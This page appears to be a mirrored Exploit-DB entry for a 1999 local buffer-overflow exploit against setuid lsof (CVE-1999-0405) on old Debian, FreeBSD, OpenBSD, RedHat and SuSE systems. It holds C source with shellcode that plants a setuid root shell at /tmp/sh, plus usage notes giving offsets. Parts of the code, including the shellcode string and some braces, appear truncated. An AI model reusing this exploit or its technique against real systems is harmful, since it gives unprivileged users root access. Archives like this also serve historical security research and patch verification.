- 34,644
- 0
- 18 Дек 2022
- 19373
- Проверка EDB
- Пройдено
- Автор
- C0ND0R
- Тип уязвимости
- Платформа
- cve-1999-0405
- Дата публикации
- 1999-02-17
Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Local Buffer Overflow (1)
// source: https://www.securityfocus.com/bid/496/info
// Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges.
* Sekure SDI (Brazilian Information Security Team)
* lsof local exploit for linux
* by c0nd0r <[email protected]>
* Security problem found by HERT. (www.hert.org)
* -> This little tool will bring you a suid or sgid shell owned by lsof
* user (root|kmem usually) at /tmp directory (/tmp/sh).
* -----------------------------------------------------------------------
* Code explanation: We've used a unsual technique here.
* The buffer allocated was too small for the standard expl, so we did a
* little trick, by overflowing with 'A' till reaching the ret address and
* then we've filled with NOP and the shellcode just after the modified
* ret address. So we have a different exploit architeture:
* [garbage][eip modified][lotsa NOP's][shellcode]
* That's why we need a bigger offset.
* -----------------------------------------------------------------------
* usage ( needa have a little brain):
* ./SDI-lsof <offset> (between 373-505)
* 4 phun - http://www.sekure.org
* Thanks to jamez, dumped, bishop, bahamas, slide, falcon, vader
* and guys at #uground (irc.brasnet.org network)
/* change the lsof path if it's needed */
#define PATH "/usr/bin/lsof"
char shellcode[] =
"\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";
unsigned long getsp ( void) {
__asm__("mov %esp,%eax");
main ( int argc, char *argv[0]) {
char b00m[220];
long addr;
int x, y, offset=380;
if (argc > 1) offset = atoi(argv[1]);
for (x = 0; x < 16; x++)
b00m[x] = 'A';
addr = getsp() + offset;
printf ( "SDI-lsof exploiting at 0x%x\n", addr);
b00m[x++] = addr & 0x000000ff;
b00m[x++] = (addr & 0x0000ff00) >> 8;
b00m[x++] = (addr & 0x00ff0000) >> 16;
b00m[x++] = (addr & 0xff000000) >> 24;
for ( ; x < 100; x++)
b00m[x] = 0x90;
for (y = 0; y < strlen(shellcode); y++, x++)
b00m[x] = shellcode[y];
b00m[strlen(b00m)] = '\0';
printf ( "\nFind a suid shell at /tmp/sh...\n\n");
execl ( PATH, PATH, "-u", b00m, (char *)0);
perror ( "execl") ;
- Источник
- www.exploit-db.com